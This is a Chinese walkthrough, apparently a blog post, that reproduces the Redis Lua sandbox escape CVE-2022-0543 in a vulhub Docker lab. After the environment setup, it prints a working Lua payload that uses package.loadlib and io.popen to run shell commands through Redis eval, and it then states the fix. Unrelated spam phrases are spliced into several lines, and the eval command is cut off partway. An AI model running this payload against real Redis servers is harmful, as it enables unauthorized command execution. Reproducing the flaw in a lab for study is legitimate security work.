CVE-2022-0543(redis沙盒逃逸)详细漏洞复现
参考:
css 外侧滚动条Redis Lua沙盒绕过命令执⾏(CVE-2022-0543)
Redis是著名的开源Key-Value数据库,其具备在沙箱中执⾏Lua脚本的能⼒。
Debian以及Ubuntu发⾏版的源在打包Redis时,不慎在Lua沙箱中遗留了⼀个对象package,攻击者可以利⽤这个对象提供的⽅法加载动态链接库liblua⾥的函数,进⽽逃逸沙箱执⾏任意命令。
直接写复现全过程吧
我们通过vulhub来直接复现靶场。我系统⽤的是Ubunt
⾸先先换源(Ubuntu的源是国外的,速度很慢,我们可以换成国内的阿⾥源)
先做好备份:
sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak
二维数组数组名接下来,修改源⽂件/etc/apt/sources.list,添加国内源
sudo vim /etc/apt/sources.list
阿⾥源:
deb mirrors.aliyun/ubuntu/ xenial main restricted universe multiverse
deb mirrors.aliyun/ubuntu/ xenial-security main restricted universe multiverse
deb mirrors.aliyun/ubuntu/ xenial-updates main restricted universe multiverse
deb mirrors.aliyun/ubuntu/ xenial-proposed main restricted universe multiverse
deb mirrors.aliyun/ubuntu/ xenial-backports main restricted universe multiverse
deb-src mirrors.aliyun/ubuntu/ xenial main restricted universe multiverse
deb-src mirrors.aliyun/ubuntu/ xenial-security main restricted universe multiverse
deb-src mirrors.aliyun/ubuntu/ xenial-updates main restricted universe multiverse
deb-src mirrors.aliyun/ubuntu/ xenial-proposed main restricted universe multiverse
deb-src mirrors.aliyun/ubuntu/ xenial-backports main restricted universe multiverse
然后进⾏源更新
sudo apt-get update
接着安装Docker:
安装vim、curl
如何制作网页招聘sudo apt install vim
sudo apt install curl
安装pip
curl -s bootstrap.pypa.io/get-pip.py | python3
#在安装pip这⼀步,可能会因为版本差异⽽有问题,我测试了两台机器,⼀台是正常安装,另外⼀台因为版本原因导致⽆法安装。 需要更新⼀下python
安装docker
curl -s get.docker/ | shjava和javaee有什么区别
然后安装docker-compose
pip install docker-compose
安装完后,我们可以通过命令docker-compose -v 来验证我们的docker-compose是否正确安装成功(此处查询的是版本号,有显⽰版本即成功)
获取vilhub:
⾸先要安装git
血清检测reactive是阴还是阳
sudo apt install git
接着下载vulhub(此步骤耗时较长)
git clone github/vulhub/vulhub.git
安装完成后我们进⼊到对应⽬录:如:
cd vulhub/redis/CVE-2022-0543/
然后执⾏命令,进⾏靶场编译和运⾏
centos和ubuntudocker-compose build
docker-compose up -d
运⾏完docker-compose后,打开我们的redis就是我们的漏洞环境啦
redis-cli -h 127.0.0.1 -p 6379
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0⾥的导出函数luaopen_io。在Lua中执⾏这个导出函数,即可获得io库,再使⽤其执⾏命令:
local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res
连接redis,使⽤eval命令执⾏上述脚本:
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls /etc/", "r"); local res = f:read(
到这我们就可以执⾏命令了。
正式修复⽅案:Lua 初始化的末尾添加package=nil 。
临时修复⽅案:关闭服务
该漏洞影响的版本有ubuntu和debian,但是我看其他帖⼦说centos也存在该漏洞,但是我尝试复现时并未成功,⽇后有空在进⾏第⼆次尝试吧 。
周五快乐

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。